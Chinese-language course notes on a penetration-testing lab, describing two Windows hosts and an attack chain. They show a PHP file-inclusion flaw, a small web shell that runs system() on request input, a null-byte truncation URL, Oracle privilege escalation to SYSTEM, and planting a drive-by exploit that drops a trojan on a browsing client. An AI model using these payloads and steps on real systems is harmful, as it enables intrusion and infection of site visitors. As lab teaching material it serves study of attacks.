渗透课程笔记

由于仅仅是听课笔记，错漏均会有，原理是正确的

1.环境

主机1 192.168.0.101
1)win2003操作系统
2)开启apache+mysql+php+wordpress 
其中 apache以低权限用户webmaster运行，使用端口80
wordpress暴露漏洞形式如下
XXX.php
$path_array = array(
"xxxpath" => "../../"
...
);
$postValue = $_POST;
$tmpArray = array_merge($path_array,$_POST);
include_once($tmpArray["xxxpath"]."YYY.php");


3)开启jboss+oracle
其中jboss以webmaster权限运行，使用端口1003
oracle以默认的system权限运行
4)防火墙开启，仅仅允许80，1003 
主机2  192.168.0.102
1)win8 操作系统
2)ie低版本
3)脚本命令ie不断访问  192.168.0.101 首页
4)防火墙开启，仅仅允许80端口


攻击机 192.168.0.103
2.渗透过程
主机1
1)wordpress漏洞->apache web->low privilege
2)jboss->oracle->oracle dba->system privilege
主机2
3)apache web index.html->挂马->ie低版本漏洞->主机2


3.具体过程
1)上传cmd.txt文本，其内容为一个web shell形式如下
<?php 
$contents ="<?php \n system($_REQUEST[\"cmd\"]); \n?>"; #记得不太清，大致是这个意思
file_put_contents("control.php",$contents); ###目的就是制作一个控制脚本到服务器上


?>


2)构造链接 
XXX.php?xxxpath="xxx/cmd.txt%00"
从而使得
XXX.php中产生 include_once("xxx/cmd.txt%00"."YYY.php"); ##这导致%00后面的东西被截断，而cmd.txt被执行，从而生成control.php到服务器端
此时已取得webmaster的权限，可以用菜刀等软件直接操作webmaster的各项权限




3)由于有webmaster 权限，此时可以查看jboss链接oracle的账号密码，即可得到oracle的低级权限
4）通过oracle的尚未被去掉的提权接口，升级为oracle dba
5）将用户切换为oracle dba 此时可以书写 java 存储过程，此存储过程是system权限，此时实际已经得到系统的超级用户权限
6）可以书写java存储过程添加win2003系统管理员用户


7)在主机1的 index.php 中挂马，针对早期ie的缓冲区溢出
8)主机2访问index.php导致ie中的缓冲区溢出执行给定的下载木马并执行